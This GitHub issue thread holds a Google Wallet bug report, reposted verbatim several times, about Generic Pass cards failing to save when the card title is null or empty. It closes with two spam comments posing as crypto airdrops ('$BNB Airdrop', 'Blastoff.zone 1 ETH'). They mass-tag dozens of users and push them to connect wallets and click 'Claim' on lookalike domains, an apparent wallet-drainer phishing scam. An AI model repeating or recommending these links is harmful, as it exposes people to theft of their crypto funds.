### ISSUE TITLE
> # Prerequisites

### ISSUE THREAD

**Issue by Adawntoremember** [WinnerEkwuazi/contact-form#4]
> # Prerequisites
> I am working on the dotnet implementation of the Generic Pass and as per our need I don't want to display the Card Title and I also want to display a custom font color for the text on the front side of the Generic Pass. But when the card title field is set to null the card is not added in the wallet rather it displays *Something went wrong message* in Google Wallet.
> 
> # Expected Behavior
> 
> - When I set the card title to null in the GenericObject the title should be set to null or empty string, and it should not be displayed when the card is added to *Google Wallet* via *Google Pay API* link.
> - The card should be added successfully to the wallet regardless of the CardTitle added or not in the JWT Payload
> 
> # Current Behavior
> 
> - The card is not added in the Google Wallet and instead the message *Something went wrong* appears.
> 
> ## Steps to Reproduce
> 
> 1. Remove the *CardTitle* field from the *GenericObject* or set the field to *string.Empty* or *" "* or *null*
> 2. Convert the model to JwtObject and create the payload
> 3. Create the JWT token add/concat it to the Google Pay API link
> 4. Use the link to add the card to the Google Wallet
> 
> ## Context
> 
> * Operating System: Windows 10
> * Browser: Microsoft Edge
> * Android Version: 13
> * Google Apis Version: 1.62.0
> 
> ## Screenshots
> ![No Card Title Added](https://github.com/google-pay/wallet-samples/assets/73248084/28bec7d3-756a-493f-8ef9-feac3e139385)
> 
> 

https://github.com/google-wallet/rest-samples/issues/99#issue-2007898824

_Originally posted by @Adawntoremember in https://github.com/google-wallet/rest-samples/issues/88#issuecomment-1872979467_

**Comment by Adawntoremember** [comment]
> > # Prerequisites
> > I am working on the dotnet implementation of the Generic Pass and as per our need I don't want to display the Card Title and I also want to display a custom font color for the text on the front side of the Generic Pass. But when the card title field is set to null the card is not added in the wallet rather it displays *Something went wrong message* in Google Wallet.
> > 
> > # Expected Behavior
> > 
> > - When I set the card title to null in the GenericObject the title should be set to null or empty string, and it should not be displayed when the card is added to *Google Wallet* via *Google Pay API* link.
> > - The card should be added successfully to the wallet regardless of the CardTitle added or not in the JWT Payload
> > 
> > # Current Behavior
> > 
> > - The card is not added in the Google Wallet and instead the message *Something went wrong* appears.
> > 
> > ## Steps to Reproduce
> > 
> > 1. Remove the *CardTitle* field from the *GenericObject* or set the field to *string.Empty* or *" "* or *null*
> > 2. Convert the model to JwtObject and create the payload
> > 3. Create the JWT token add/concat it to the Google Pay API link
> > 4. Use the link to add the card to the Google Wallet
> > 
> > ## Context
> > 
> > * Operating System: Windows 10
> > * Browser: Microsoft Edge
> > * Android Version: 13
> > * Google Apis Version: 1.62.0
> > 
> > ## Screenshots
> > ![No Card Title Added](https://github.com/google-pay/wallet-samples/assets/73248084/28bec7d3-756a-493f-8ef9-feac3e139385)
> > 
> > 
> 
> https://github.com/google-wallet/rest-samples/issues/99#issue-2007898824
> 
> _Originally posted by @Adawntoremember in https://github.com/google-wallet/rest-samples/issues/88#issuecomment-1872979467_

**Comment by Adawntoremember** [comment]
Okay thanks for the help
Hiw can I contact you for future help

**Comment by Adawntoremember** [comment]
> > # Prerequisites
> > I am working on the dotnet implementation of the Generic Pass and as per our need I don't want to display the Card Title and I also want to display a custom font color for the text on the front side of the Generic Pass. But when the card title field is set to null the card is not added in the wallet rather it displays *Something went wrong message* in Google Wallet.
> > 
> > # Expected Behavior
> > 
> > - When I set the card title to null in the GenericObject the title should be set to null or empty string, and it should not be displayed when the card is added to *Google Wallet* via *Google Pay API* link.
> > - The card should be added successfully to the wallet regardless of the CardTitle added or not in the JWT Payload
> > 
> > # Current Behavior
> > 
> > - The card is not added in the Google Wallet and instead the message *Something went wrong* appears.
> > 
> > ## Steps to Reproduce
> > 
> > 1. Remove the *CardTitle* field from the *GenericObject* or set the field to *string.Empty* or *" "* or *null*
> > 2. Convert the model to JwtObject and create the payload
> > 3. Create the JWT token add/concat it to the Google Pay API link
> > 4. Use the link to add the card to the Google Wallet
> > 
> > ## Context
> > 
> > * Operating System: Windows 10
> > * Browser: Microsoft Edge
> > * Android Version: 13
> > * Google Apis Version: 1.62.0
> > 
> > ## Screenshots
> > ![No Card Title Added](https://github.com/google-pay/wallet-samples/assets/73248084/28bec7d3-756a-493f-8ef9-feac3e139385)
> > 
> > 
> 
> https://github.com/google-wallet/rest-samples/issues/99#issue-2007898824
> 
> _Originally posted by @Adawntoremember in https://github.com/google-wallet/rest-samples/issues/88#issuecomment-1872979467_

**Comment by Adawntoremember** [comment]
> > # Prerequisites
> > I am working on the dotnet implementation of the Generic Pass and as per our need I don't want to display the Card Title and I also want to display a custom font color for the text on the front side of the Generic Pass. But when the card title field is set to null the card is not added in the wallet rather it displays *Something went wrong message* in Google Wallet.
> > 
> > # Expected Behavior
> > 
> > - When I set the card title to null in the GenericObject the title should be set to null or empty string, and it should not be displayed when the card is added to *Google Wallet* via *Google Pay API* link.
> > - The card should be added successfully to the wallet regardless of the CardTitle added or not in the JWT Payload
> > 
> > # Current Behavior
> > 
> > - The card is not added in the Google Wallet and instead the message *Something went wrong* appears.
> > 
> > ## Steps to Reproduce
> > 
> > 1. Remove the *CardTitle* field from the *GenericObject* or set the field to *string.Empty* or *" "* or *null*
> > 2. Convert the model to JwtObject and create the payload
> > 3. Create the JWT token add/concat it to the Google Pay API link
> > 4. Use the link to add the card to the Google Wallet
> > 
> > ## Context
> > 
> > * Operating System: Windows 10
> > * Browser: Microsoft Edge
> > * Android Version: 13
> > * Google Apis Version: 1.62.0
> > 
> > ## Screenshots
> > ![No Card Title Added](https://github.com/google-pay/wallet-samples/assets/73248084/28bec7d3-756a-493f-8ef9-feac3e139385)
> > 
> > 
> 
> https://github.com/google-wallet/rest-samples/issues/99#issue-2007898824
> 
> _Originally posted by @Adawntoremember in https://github.com/google-wallet/rest-samples/issues/88#issuecomment-1872979467_

**Comment by kaneson** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @1574242600, @RSyehann, @19abhishek, @shake863, @ngoclong19, @Stamp9, @paulsimroth, @PerfectMay, @MISSAUTH, @techken, @jordanlepera, @ada271828, @nickkatsios, @DaveRev, @aphananthe42, @yeahlincoln, @cutefcc, @brendankmorrison, @sunui, @Bigdawg001, @bkpecho, @Tesla-admirer, @Cjsmack, @KaikisC, @parpok, @DPS0340, @AlexiaChen, @hub500, @peg1708, @indeavr

**Comment by carlosfgti** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
IceEFresh, @lightcap, @Terrapind, @Pnkjgot01, @bst1n, @Larryziegler12, @boardroombully, @elanchou, @avenbreaks, @ktz168, @anhng-sg, @KalpeshTalkar, @Viserion-7, @suniljoshi151, @Paing66, @evanhongLA, @Ando22, @erwinqxy, @niosvargas, @LuisClapp, @aasszzx707, @tct68, @cenobyte321, @mayassalman, @nanfoundation, @player11873, @izamscientist, @3scava1i3r, @ice175, @DexSwaper, @Shai69bb, @sandipermadi, @emnul, @Balkanna, @SSimonPhd, @vivekpal1, @Asofe1997, @bidzyyys, @Gawron12, @doperiddle, @taylorak, @mrxvt, @Luusieu9, @hamidlegend, @Tittoh, @aniaan, @pabloeisenhut, @mojof522, @roushanverma123, @ELEAC
